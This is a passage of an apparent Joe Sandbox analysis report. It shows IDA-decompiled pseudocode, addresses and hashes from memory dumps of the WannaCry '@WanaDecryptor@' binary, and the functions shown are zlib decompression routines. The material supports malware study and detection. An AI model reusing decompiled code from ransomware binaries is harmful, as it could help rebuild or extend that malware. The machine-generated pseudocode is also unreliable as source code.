                                                      											 *(__esi + 0x34) = __edx;
                                                      											__eax = E0040DDA0();
                                                      											__esp = __esp + 0xc;
                                                      											return __eax;
                                                      										} else {
                                                      											goto L83;
                                                      										}
                                                      									} else {
                                                      										__eax =  *(__esi + 0x30);
                                                      										__ecx =  *(__esi + 0x28);
                                                      										if(__eax == __ecx) {
                                                      											goto L73;
                                                      										} else {
                                                      											__edx = __ecx;
                                                      											if(__edx >= __eax) {
                                                      												__eax =  *(__esp + 0x18);
                                                      												__eax =  *(__esp + 0x18) - __edx;
                                                      											} else {
                                                      												__eax = __eax - __edx;
                                                      												__eax = __eax - 1;
                                                      											}
                                                      											if(__eax != 0) {
                                                      												goto L83;
                                                      											} else {
                                                      												goto L73;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								goto L99;
                                                      							case 7:
                                                      								if(__ebx > 7) {
                                                      									__ecx =  *(__esp + 0x2c);
                                                      									__ebx = __ebx - 8;
                                                      									__ecx =  *(__esp + 0x2c) + 1;
                                                      									__ebp = __ebp - 1;
                                                      									 *(__esp + 0x2c) =  *(__esp + 0x2c) + 1;
                                                      								}
                                                      								 *(__esi + 0x34) = __edx;
                                                      								__edx =  *(__esp + 0x30);
                                                      								_push( *(__esp + 0x30));
                                                      								_push(__edi);
                                                      								_push(__esi);
                                                      								__eax = E0040DDA0();
                                                      								__edx =  *(__esi + 0x34);
                                                      								__ecx =  *(__esi + 0x30);
                                                      								__esp = __esp + 0xc;
                                                      								if( *(__esi + 0x30) == __edx) {
                                                      									__eax =  *(__esp + 0x10);
                                                      									 *( *(__esp + 0x10)) = 8;
                                                      									goto L97;
                                                      								} else {
                                                      									__ecx =  *(__esp + 0x28);
                                                      									 *(__esi + 0x1c) = __ebx;
                                                      									 *(__esi + 0x20) =  *(__esp + 0x28);
                                                      									__ecx =  *(__esp + 0x2c);
                                                      									__ebx =  *__edi;
                                                      									__edi[1] =  *(__esp + 0x2c);
                                                      									__ecx = __ebp;
                                                      									_push(__eax);
                                                      									__ecx = __ebp -  *__edi;
                                                      									__edi[2] = __edi[2] + __ebp -  *__edi;
                                                      									_push(__edi);
                                                      									__edi[2] = __edi[2] + __ebp -  *__edi;
                                                      									 *__edi = __ebp;
                                                      									_push(__esi);
                                                      									 *(__esi + 0x34) = __edx;
                                                      									__eax = E0040DDA0();
                                                      									__esp = __esp + 0xc;
                                                      									return __eax;
                                                      								}
                                                      								goto L99;
                                                      							case 8:
                                                      								L97:
                                                      								__ecx =  *(__esp + 0x28);
                                                      								__eax =  *(__esp + 0x2c);
                                                      								 *(__esi + 0x20) =  *(__esp + 0x28);
                                                      								 *(__esi + 0x1c) = __ebx;
                                                      								__ebx =  *__edi;
                                                      								__ecx = __ebp;
                                                      								__edi[1] =  *(__esp + 0x2c);
                                                      								__eax = __edi[2];
                                                      								__ecx = __ebp -  *__edi;
                                                      								_push(1);
                                                      								__eax = __edi[2] + __ebp -  *__edi;
                                                      								_push(__edi);
                                                      								__edi[2] = __edi[2] + __ebp -  *__edi;
                                                      								 *__edi = __ebp;
                                                      								_push(__esi);
                                                      								 *(__esi + 0x34) = __edx;
                                                      								__eax = E0040DDA0();
                                                      								__esp = __esp + 0xc;
                                                      								return __eax;
                                                      								goto L99;
                                                      							case 9:
                                                      								__eax =  *(__esp + 0x28);
                                                      								__ecx =  *(__esp + 0x2c);
                                                      								 *(__esi + 0x20) =  *(__esp + 0x28);
                                                      								 *(__esi + 0x1c) = __ebx;
                                                      								__ebx =  *__edi;
                                                      								__eax = __ebp;
                                                      								__edi[1] =  *(__esp + 0x2c);
                                                      								__ecx = __edi[2];
                                                      								__eax = __ebp -  *__edi;
                                                      								_push(0xfffffffd);
                                                      								__ecx = __edi[2] + __ebp -  *__edi;
                                                      								_push(__edi);
                                                      								__edi[2] = __edi[2] + __ebp -  *__edi;
                                                      								 *__edi = __ebp;
                                                      								_push(__esi);
                                                      								 *(__esi + 0x34) = __edx;
                                                      								__eax = E0040DDA0();
                                                      								__esp = __esp + 0xc;
                                                      								return __eax;
                                                      								goto L99;
                                                      						}
                                                      						L85:
                                                      						_t362 =  *( *(_t412 + 0x10));
                                                      					} while (_t362 <= 9);
                                                      					goto L86;
                                                      				}
                                                      				L99:
                                                      			}













                                                      0x0040e425
                                                      0x0040e425
                                                      0x0040e42a
                                                      0x0040e42e
                                                      0x0040e44f
                                                      0x0040e44f
                                                      0x0040e452
                                                      0x0040e456
                                                      0x0040e457
                                                      0x0040e458
                                                      0x0040e459
                                                      0x0040e45e
                                                      0x0040e461
                                                      0x0040e465
                                                      0x0040e468
                                                      0x0040e46d
                                                      0x0040e471
                                                      0x0040e478
                                                      0x0040e47b
                                                      0x0040e473
                                                      0x0040e473
                                                      0x0040e475
                                                      0x0040e475
                                                      0x0040e47d
                                                      0x0040e480
                                                      0x0040e486
                                                      0x0040e48a
                                                      0x0040e48c
                                                      0x0040e48f
                                                      0x0040e495
                                                      0x0040e4aa
                                                      0x0040e497
                                                      0x0040e497
                                                      0x0040e49b
                                                      0x0040e4a2
                                                      0x0040e4a6
                                                      0x0040e49d
                                                      0x0040e49d
                                                      0x0040e49f
                                                      0x0040e49f
                                                      0x0040e49b
                                                      0x0040e495
                                                      0x0040e4b0
                                                      0x0040e5b2
                                                      0x0040e5b2
                                                      0x0040e5b6
                                                      0x0040e5ba
                                                      0x0040e5bd
                                                      0x0040e5c0
                                                      0x0040e5c2
                                                      0x0040e5c4
                                                      0x0040e5c7
                                                      0x0040e5ca
                                                      0x0040e5cc
                                                      0x0040e5ce
                                                      0x0040e5d0
                                                      0x0040e5d3
                                                      0x0040e5d7
                                                      0x0040e5d8
                                                      0x0040e5d9
                                                      0x0040e5da
                                                      0x0040e5dd
                                                      0x0040e5e2
                                                      0x0040e5ec
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e430
                                                      0x0040e430
                                                      0x0040e433
                                                      0x0040e438
                                                      0x00000000
                                                      0x0040e43a
                                                      0x0040e43a
                                                      0x0040e43e
                                                      0x0040e445
                                                      0x0040e449
                                                      0x0040e440
                                                      0x0040e440
                                                      0x0040e442
                                                      0x0040e442
                                                      0x0040e44d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e44d
                                                      0x0040e438
                                                      0x0040e42e
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e5f0
                                                      0x0040e5f2
                                                      0x0040e5f6
                                                      0x0040e5f9
                                                      0x0040e5fa
                                                      0x0040e5fb
                                                      0x0040e5fb
                                                      0x0040e5ff
                                                      0x0040e602
                                                      0x0040e606
                                                      0x0040e607
                                                      0x0040e608
                                                      0x0040e609
                                                      0x0040e60e
                                                      0x0040e611
                                                      0x0040e614
                                                      0x0040e619
                                                      0x0040e652
                                                      0x0040e656
                                                      0x00000000
                                                      0x0040e61b
                                                      0x0040e61b
                                                      0x0040e61f
                                                      0x0040e622
                                                      0x0040e625
                                                      0x0040e629
                                                      0x0040e62b
                                                      0x0040e62e
                                                      0x0040e630
                                                      0x0040e631
                                                      0x0040e636
                                                      0x0040e638
                                                      0x0040e639
                                                      0x0040e63c
                                                      0x0040e63e
                                                      0x0040e63f
                                                      0x0040e642
                                                      0x0040e647
                                                      0x0040e651
                                                      0x0040e651
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e65c
                                                      0x0040e65c
                                                      0x0040e660
                                                      0x0040e664
                                                      0x0040e667
                                                      0x0040e66a
                                                      0x0040e66c
                                                      0x0040e66e
                                                      0x0040e671
                                                      0x0040e674
                                                      0x0040e676
                                                      0x0040e678
                                                      0x0040e67a
                                                      0x0040e67b
                                                      0x0040e67e
                                                      0x0040e680
                                                      0x0040e681
                                                      0x0040e684
                                                      0x0040e689
                                                      0x0040e693
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e694
                                                      0x0040e698
                                                      0x0040e69c
                                                      0x0040e69f
                                                      0x0040e6a2
                                                      0x0040e6a4
                                                      0x0040e6a6
                                                      0x0040e6a9
                                                      0x0040e6ac
                                                      0x0040e6ae
                                                      0x0040e6b0
                                                      0x0040e6b2
                                                      0x0040e6b3
                                                      0x0040e6b6
                                                      0x0040e6b8
                                                      0x0040e6b9
                                                      0x0040e6bc
                                                      0x0040e6c1
                                                      0x0040e6cb
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e4d8
                                                      0x0040e4dc
                                                      0x0040e4de
                                                      0x00000000
                                                      0x0040df7c
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b8eabf12bd29c3c38fc8e7bc8212d9d6bf0432072041c2816a53c5bd799d9a5
                                                      • Instruction ID: e5ae74944e208cb03c60f72bb217c75502e03934b58f7a9b199ce6c2a9593854
                                                      • Opcode Fuzzy Hash: 9b8eabf12bd29c3c38fc8e7bc8212d9d6bf0432072041c2816a53c5bd799d9a5
                                                      • Instruction Fuzzy Hash: 5E2239B46083018FC308CF29D590A2ABBE1FF88354F148A6EE49AD7751D734E955CF5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 98%
                                                      			E00410460(intOrPtr* _a4, signed int _a8) {
                                                      				signed int* _t124;
                                                      				signed int _t172;
                                                      				signed int _t176;
                                                      				signed int _t225;
                                                      				intOrPtr* _t229;
                                                      				signed int _t230;
                                                      
                                                      				_t229 = _a4;
                                                      				if(_t229 == 0) {
                                                      					L36:
                                                      					return 0xfffffffe;
                                                      				} else {
                                                      					_t124 =  *(_t229 + 0x1c);
                                                      					if(_t124 != 0 &&  *_t229 != 0) {
                                                      						_t176 =  *_t124;
                                                      						_t225 = 0xfffffffb;
                                                      						_t172 = (0 | _a8 != 0x00000004) - 0x00000001 & 0xfffffffb;
                                                      						_a8 = _t172;
                                                      						if(_t176 <= 0xd) {
                                                      							_t230 = 5;
                                                      							do {
                                                      								switch( *((intOrPtr*)(_t176 * 4 +  &M00410860))) {
                                                      									case 0:
                                                      										_t177 =  *((intOrPtr*)(_t229 + 4));
                                                      										if(_t177 == 0) {
                                                      											goto L39;
                                                      										} else {
                                                      											 *((intOrPtr*)(_t229 + 4)) = _t177 - 1;
                                                      											_t225 = _t172;
                                                      											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
                                                      											_t124[1] = 0;
                                                      											_t126 =  *(_t229 + 0x1c);
                                                      											 *_t229 =  *_t229 + 1;
                                                      											if((_t126[1] & 0x0000000f) == 8) {
                                                      												if((_t126[1] >> 4) + 8 <= _t126[4]) {
                                                      													 *_t126 = 1;
                                                      													goto L12;
                                                      												} else {
                                                      													 *_t126 = 0xd;
                                                      													 *(_t229 + 0x18) = "invalid window size";
                                                      													goto L34;
                                                      												}
                                                      											} else {
                                                      												 *_t126 = 0xd;
                                                      												 *(_t229 + 0x18) = "unknown compression method";
                                                      												goto L34;
                                                      											}
                                                      										}
                                                      										goto L54;
                                                      									case 1:
                                                      										L12:
                                                      										_t127 =  *((intOrPtr*)(_t229 + 4));
                                                      										if(_t127 == 0) {
                                                      											goto L39;
                                                      										} else {
                                                      											 *((intOrPtr*)(_t229 + 4)) = _t127 - 1;
                                                      											_t225 = _t172;
                                                      											_t173 =  *(_t229 + 0x1c);
                                                      											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
                                                      											_t131 =  *_t229;
                                                      											_t188 =  *_t131;
                                                      											 *_t229 = _t131 + 1;
                                                      											if((_t173[1] << 8) % 0x1f == 0) {
                                                      												if((_t188 & 0x00000020) != 0) {
                                                      													_t174 = _a8;
                                                      													 *( *(_t229 + 0x1c)) = 2;
                                                      													goto L38;
                                                      												} else {
                                                      													 *_t173 = 7;
                                                      													_t172 = _a8;
                                                      													_t230 = 5;
                                                      													goto L35;
                                                      												}
                                                      											} else {
                                                      												 *_t173 = 0xd;
                                                      												_t172 = _a8;
                                                      												_t230 = 5;
                                                      												 *(_t229 + 0x18) = "incorrect header check";
                                                      												( *(_t229 + 0x1c))[1] = 5;
                                                      												goto L35;
                                                      											}
                                                      										}
                                                      										goto L54;
                                                      									case 2:
                                                      										L38:
                                                      										_t138 =  *((intOrPtr*)(_t229 + 4));
                                                      										if(_t138 != 0) {
                                                      											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
                                                      											 *((intOrPtr*)(_t229 + 4)) = _t138 - 1;
                                                      											_t226 = _t174;
                                                      											( *(_t229 + 0x1c))[2] = 0 << 0x18;
                                                      											 *_t229 =  *_t229 + 1;
                                                      											 *( *(_t229 + 0x1c)) = 3;
                                                      											goto L41;
                                                      										} else {
                                                      											goto L39;
                                                      										}
                                                      										goto L54;
                                                      									case 3:
                                                      										L41:
                                                      										_t143 =  *((intOrPtr*)(_t229 + 4));
                                                      										if(_t143 != 0) {
                                                      											 *((intOrPtr*)(_t229 + 4)) = _t143 - 1;
                                                      											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
                                                      											_t227 = _t174;
                                                      											( *(_t229 + 0x1c))[2] = ( *(_t229 + 0x1c))[2] + (0 << 0x10);
                                                      											 *_t229 =  *_t229 + 1;
                                                      											 *( *(_t229 + 0x1c)) = 4;
                                                      											goto L44;
                                                      										} else {
                                                      											return _t226;
                                                      										}
                                                      										goto L54;
                                                      									case 4:
                                                      										L44:
                                                      										_t150 =  *((intOrPtr*)(_t229 + 4));
                                                      										if(_t150 != 0) {
                                                      											 *((intOrPtr*)(_t229 + 4)) = _t150 - 1;
                                                      											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
                                                      											_t228 = _t174;
                                                      											( *(_t229 + 0x1c))[2] = ( *(_t229 + 0x1c))[2] + (0 << 8);
                                                      											 *_t229 =  *_t229 + 1;
                                                      											 *( *(_t229 + 0x1c)) = 5;
                                                      											goto L47;
                                                      										} else {
                                                      											return _t227;
                                                      										}
                                                      										goto L54;
                                                      									case 5:
                                                      										L47:
                                                      										_t158 =  *((intOrPtr*)(_t229 + 4));
                                                      										if(_t158 != 0) {
                                                      											 *((intOrPtr*)(_t229 + 4)) = _t158 - 1;
                                                      											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
                                                      											( *(_t229 + 0x1c))[2] = ( *(_t229 + 0x1c))[2];
                                                      											 *_t229 =  *_t229 + 1;
                                                      											_t163 =  *(_t229 + 0x1c);
                                                      											 *(_t229 + 0x30) = _t163[2];
                                                      											 *_t163 = 6;
                                                      											return 2;
                                                      										} else {
                                                      											return _t228;
                                                      										}
                                                      										goto L54;
                                                      									case 6:
                                                      										 *(__esi[7]) = 0xd;
                                                      										__eax = __esi[7];
                                                      										__esi[6] = "need dictionary";
                                                      										 *((intOrPtr*)(__esi[7] + 4)) = 0;
                                                      										__eax = 0xfffffffe;
                                                      										return 0xfffffffe;
                                                      										goto L54;
                                                      									case 7:
                                                      										_push(__edi);
                                                      										_push(__esi);
                                                      										_push( *((intOrPtr*)(__eax + 0x14)));
                                                      										__edi = E0040E840();
                                                      										__esp = __esp + 0xc;
                                                      										if(__edi != 0xfffffffd) {
                                                      											if(__edi == 0) {
                                                      												__edi = __ebx;
                                                      											}
                                                      											if(__edi != 1) {
                                                      												goto L39;
                                                      											} else {
                                                      												__eax = __esi[7];
                                                      												__edi = __ebx;
                                                      												__eax = E0040E720( *((intOrPtr*)(__esi[7] + 0x14)), __esi, __esi[7] + 4);
                                                      												__eax = __esi[7];
                                                      												if( *((intOrPtr*)(__eax + 0xc)) == 0) {
                                                      													 *__eax = 8;
                                                      													goto L25;
                                                      												} else {
                                                      													 *__eax = 0xc;
                                                      													goto L35;
                                                      												}
                                                      											}
                                                      										} else {
                                                      											 *(__esi[7]) = 0xd;
                                                      											__eax = __esi[7];
                                                      											 *((intOrPtr*)(__eax + 4)) = 0;
                                                      											goto L35;
                                                      										}
                                                      										goto L54;
                                                      									case 8:
                                                      										L25:
                                                      										__eax = __esi[1];
                                                      										if(__eax == 0) {
                                                      											goto L39;
                                                      										} else {
                                                      											__esi[1] = __eax;
                                                      											__esi[2] = __esi[2] + 1;
                                                      											__esi[2] = __esi[2] + 1;
                                                      											__eax =  *__esi;
                                                      											__edi = __ebx;
                                                      											 *(__esi[7] + 8) = 0 << 0x18;
                                                      											 *__esi =  *__esi + 1;
                                                      											 *__esi =  *__esi + 1;
                                                      											__eax = __esi[7];
                                                      											 *(__esi[7]) = 9;
                                                      											goto L27;
                                                      										}
                                                      										goto L54;
                                                      									case 9:
                                                      										L27:
                                                      										__eax = __esi[1];
                                                      										if(__eax == 0) {
                                                      											goto L39;
                                                      										} else {
                                                      											__eax = __eax - 1;
                                                      											__esi[2] = __esi[2] + 1;
                                                      											__esi[1] = __eax;
                                                      											__eax = __esi[7];
                                                      											__edi = __ebx;
                                                      											 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 0x10);
                                                      											 *__esi =  *__esi + 1;
                                                      											 *__esi =  *__esi + 1;
                                                      											__eax = __esi[7];
                                                      											 *(__esi[7]) = 0xa;
                                                      											goto L29;
                                                      										}
                                                      										goto L54;
                                                      									case 0xa:
                                                      										L29:
                                                      										__eax = __esi[1];
                                                      										if(__eax == 0) {
                                                      											goto L39;
                                                      										} else {
                                                      											__eax = __eax - 1;
                                                      											__esi[2] = __esi[2] + 1;
                                                      											__esi[1] = __eax;
                                                      											__eax = __esi[7];
                                                      											__edi = __ebx;
                                                      											 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 8);
                                                      											 *__esi =  *__esi + 1;
                                                      											 *__esi =  *__esi + 1;
                                                      											__eax = __esi[7];
                                                      											 *(__esi[7]) = 0xb;
                                                      											goto L31;
                                                      										}
                                                      										goto L54;
                                                      									case 0xb:
                                                      										L31:
                                                      										__eax = __esi[1];
                                                      										if(__eax == 0) {
                                                      											L39:
                                                      											return _t225;
                                                      										} else {
                                                      											__esi[1] = __eax;
                                                      											__eax = __esi[7];
                                                      											__esi[2] = __esi[2] + 1;
                                                      											__edi = __ebx;
                                                      											 *(__esi[7] + 8) =  *(__esi[7] + 8);
                                                      											 *__esi =  *__esi + 1;
                                                      											 *__esi =  *__esi + 1;
                                                      											__eax = __esi[7];
                                                      											if( *((intOrPtr*)(__eax + 4)) ==  *((intOrPtr*)(__eax + 8))) {
                                                      												 *(__esi[7]) = 0xc;
                                                      												goto L52;
                                                      											} else {
                                                      												 *__eax = 0xd;
                                                      												__esi[6] = "incorrect data check";
                                                      												L34:
                                                      												( *(_t229 + 0x1c))[1] = _t230;
                                                      												goto L35;
                                                      											}
                                                      										}
                                                      										goto L54;
                                                      									case 0xc:
                                                      										L52:
                                                      										__eax = 1;
                                                      										return 1;
                                                      										goto L54;
                                                      									case 0xd:
                                                      										__eax = 0xfffffffd;
                                                      										return 0xfffffffd;
                                                      										goto L54;
                                                      								}
                                                      								L35:
                                                      								_t124 =  *(_t229 + 0x1c);
                                                      								_t176 =  *_t124;
                                                      							} while (_t176 <= 0xd);
                                                      						}
                                                      					}
                                                      					goto L36;
                                                      				}
                                                      				L54:
                                                      			}










                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • Opcode ID: 5ba8141ea2280d0230f62837d297c6f142902cf6410748b00ceee70376d87497
                                                      • Instruction ID: d75a74fb3a0dfdb81fbbcc262e1caa4e3a0368247a27923ffbf4d457c3a86cdc
                                                      • Opcode Fuzzy Hash: 5ba8141ea2280d0230f62837d297c6f142902cf6410748b00ceee70376d87497
                                                      • Instruction Fuzzy Hash: E4E105B5600A018FD334CF19D490A62FBF2EF89310B25C96ED4AACB761D775E886CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E0040FBC0() {
                                                      				signed int _t153;
                                                      				unsigned int _t155;
                                                      				unsigned int _t161;
                                                      				signed char _t173;
                                                      				signed int _t176;
                                                      				intOrPtr _t177;
                                                      				signed int _t178;
                                                      				signed char _t180;
                                                      				signed int _t181;
                                                      				intOrPtr _t182;
                                                      				intOrPtr _t193;
                                                      				signed int _t200;
                                                      				intOrPtr _t201;
                                                      				signed int _t204;
                                                      				signed int _t212;
                                                      				signed int _t219;
                                                      				signed int _t235;
                                                      				signed int _t240;
                                                      				void* _t241;
                                                      				void* _t242;
                                                      				void* _t243;
                                                      				intOrPtr* _t249;
                                                      				signed int _t252;
                                                      				signed int _t261;
                                                      				signed int _t267;
                                                      				unsigned int _t270;
                                                      				unsigned int _t273;
                                                      				char* _t279;
                                                      				char* _t280;
                                                      				char* _t281;
                                                      				char* _t282;
                                                      				char* _t283;
                                                      				intOrPtr _t284;
                                                      				intOrPtr _t285;
                                                      				void* _t286;
                                                      				intOrPtr* _t287;
                                                      				signed int _t289;
                                                      				intOrPtr _t290;
                                                      				void* _t291;
                                                      				intOrPtr* _t295;
                                                      				intOrPtr* _t297;
                                                      				intOrPtr* _t299;
                                                      				intOrPtr* _t301;
                                                      				signed int _t305;
                                                      				signed int _t309;
                                                      				intOrPtr* _t313;
                                                      				intOrPtr _t317;
                                                      				void* _t320;
                                                      				intOrPtr _t321;
                                                      				signed int _t323;
                                                      				intOrPtr _t325;
                                                      				intOrPtr _t326;
                                                      				signed int _t327;
                                                      				void* _t328;
                                                      				void* _t330;
                                                      				void* _t331;
                                                      
                                                      				_t153 =  *(_t331 + 0x2c);
                                                      				_t204 =  *(_t331 + 0x28);
                                                      				_t316 =  *_t153;
                                                      				_t270 =  *(_t204 + 0x20);
                                                      				_t284 =  *((intOrPtr*)(_t204 + 0x30));
                                                      				_t279 =  *((intOrPtr*)(_t204 + 0x34));
                                                      				 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t153 + 4));
                                                      				_t155 =  *(_t204 + 0x1c);
                                                      				 *((intOrPtr*)(_t331 + 0x18)) = _t316;
                                                      				if(_t279 >= _t284) {
                                                      					 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t204 + 0x2c)) - _t279;
                                                      				} else {
                                                      					 *((intOrPtr*)(_t331 + 0x14)) = _t284 - _t279 - 1;
                                                      				}
                                                      				 *(_t331 + 0x1c) =  *(0x41a260 +  *(_t331 + 0x28) * 4);
                                                      				 *(_t331 + 0x20) =  *(0x41a260 +  *(_t331 + 0x2c) * 4);
                                                      				L4:
                                                      				while(1) {
                                                      					if(_t155 < 0x14) {
                                                      						do {
                                                      							 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
                                                      							_t289 = 0 << _t155;
                                                      							_t155 = _t155 + 8;
                                                      							_t270 = _t270 | _t289;
                                                      							_t316 = _t316 + 1;
                                                      						} while (_t155 < 0x14);
                                                      						 *((intOrPtr*)(_t331 + 0x18)) = _t316;
                                                      					}
                                                      					_t285 =  *((intOrPtr*)(_t331 + 0x30));
                                                      					_t212 =  *(_t331 + 0x1c) & _t270;
                                                      					_t173 =  *((intOrPtr*)(_t285 + _t212 * 8));
                                                      					_t286 = _t285 + _t212 * 8;
                                                      					if(0 == 0) {
                                                      						L35:
                                                      						_t270 = _t270 >>  *(_t286 + 1);
                                                      						_t155 = _t155;
                                                      						 *_t279 =  *((intOrPtr*)(_t286 + 4));
                                                      						_t279 = _t279 + 1;
                                                      						 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t331 + 0x14)) - 1;
                                                      						goto L36;
                                                      					} else {
                                                      						_t270 = _t270 >>  *(_t286 + 1);
                                                      						_t155 = _t155;
                                                      						 *(_t331 + 0x28) = 0;
                                                      						if((_t173 & 0x00000010) != 0) {
                                                      							L12:
                                                      							_t178 = _t173 & 0x0000000f;
                                                      							_t161 = _t155 - _t178;
                                                      							 *(_t331 + 0x2c) = ( *(0x41a260 + _t178 * 4) & _t270) +  *((intOrPtr*)(_t286 + 4));
                                                      							_t273 = _t270 >> _t178;
                                                      							if(_t161 < 0xf) {
                                                      								do {
                                                      									 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
                                                      									_t309 = 0 << _t161;
                                                      									_t161 = _t161 + 8;
                                                      									_t273 = _t273 | _t309;
                                                      									_t316 = _t316 + 1;
                                                      								} while (_t161 < 0xf);
                                                      								 *((intOrPtr*)(_t331 + 0x18)) = _t316;
                                                      							}
                                                      							_t290 =  *((intOrPtr*)(_t331 + 0x34));
                                                      							_t235 =  *(_t331 + 0x20) & _t273;
                                                      							_t180 =  *((intOrPtr*)(_t290 + _t235 * 8));
                                                      							_t291 = _t290 + _t235 * 8;
                                                      							_t270 = _t273 >>  *(_t291 + 1);
                                                      							_t155 = _t161;
                                                      							 *(_t331 + 0x28) = 0;
                                                      							if((_t180 & 0x00000010) != 0) {
                                                      								L18:
                                                      								_t181 = _t180 & 0x0000000f;
                                                      								while(_t155 < _t181) {
                                                      									 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
                                                      									_t323 = 0 << _t155;
                                                      									_t155 = _t155 + 8;
                                                      									_t270 = _t270 | _t323;
                                                      									_t316 =  *((intOrPtr*)(_t331 + 0x18)) + 1;
                                                      									 *((intOrPtr*)(_t331 + 0x18)) =  *((intOrPtr*)(_t331 + 0x18)) + 1;
                                                      								}
                                                      								_t320 = ( *(0x41a260 + _t181 * 4) & _t270) +  *((intOrPtr*)(_t291 + 4));
                                                      								_t270 = _t270 >> _t181;
                                                      								_t240 =  *(_t331 + 0x2c);
                                                      								_t155 = _t155 - _t181;
                                                      								 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t331 + 0x14)) - _t240;
                                                      								_t295 = _t279 - _t320;
                                                      								_t321 =  *((intOrPtr*)(_t331 + 0x38));
                                                      								_t182 =  *((intOrPtr*)(_t321 + 0x28));
                                                      								if(_t295 >= _t182) {
                                                      									 *_t279 =  *_t295;
                                                      									_t280 = _t279 + 1;
                                                      									 *_t280 =  *((intOrPtr*)(_t295 + 1));
                                                      									_t281 = _t280 + 1;
                                                      									_t297 = _t295 + 2;
                                                      									_t241 = _t240 - 2;
                                                      									do {
                                                      										 *_t281 =  *_t297;
                                                      										_t281 = _t281 + 1;
                                                      										_t297 = _t297 + 1;
                                                      										_t241 = _t241 - 1;
                                                      									} while (_t241 != 0);
                                                      									_t316 =  *((intOrPtr*)(_t331 + 0x18));
                                                      								} else {
                                                      									_t327 =  *(_t321 + 0x2c);
                                                      									 *(_t331 + 0x28) = _t327;
                                                      									_t328 = _t327 - _t182;
                                                      									do {
                                                      										_t295 = _t295 + _t328;
                                                      									} while (_t295 < _t182);
                                                      									_t330 =  *(_t331 + 0x28) - _t295;
                                                      									if(_t240 <= _t330) {
                                                      										 *_t279 =  *_t295;
                                                      										_t282 = _t279 + 1;
                                                      										 *_t282 =  *((intOrPtr*)(_t295 + 1));
                                                      										_t283 = _t282 + 1;
                                                      										_t299 = _t295 + 2;
                                                      										_t242 = _t240 - 2;
                                                      										do {
                                                      											 *_t283 =  *_t299;
                                                      											_t283 = _t283 + 1;
                                                      											_t299 = _t299 + 1;
                                                      											_t242 = _t242 - 1;
                                                      										} while (_t242 != 0);
                                                      										_t316 =  *((intOrPtr*)(_t331 + 0x18));
                                                      									} else {
                                                      										_t243 = _t240 - _t330;
                                                      										do {
                                                      											 *_t279 =  *_t295;
                                                      											_t279 = _t279 + 1;
                                                      											_t295 = _t295 + 1;
                                                      											_t330 = _t330 - 1;
                                                      										} while (_t330 != 0);
                                                      										_t301 =  *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x38)) + 0x28));
                                                      										do {
                                                      											 *_t279 =  *_t301;
                                                      											_t279 = _t279 + 1;
                                                      											_t301 = _t301 + 1;
                                                      											_t243 = _t243 - 1;
                                                      										} while (_t243 != 0);
                                                      										_t316 =  *((intOrPtr*)(_t331 + 0x18));
                                                      									}
                                                      								}
                                                      								L36:
                                                      								if( *((intOrPtr*)(_t331 + 0x14)) < 0x102 ||  *((intOrPtr*)(_t331 + 0x10)) < 0xa) {
                                                      									_t287 =  *((intOrPtr*)(_t331 + 0x3c));
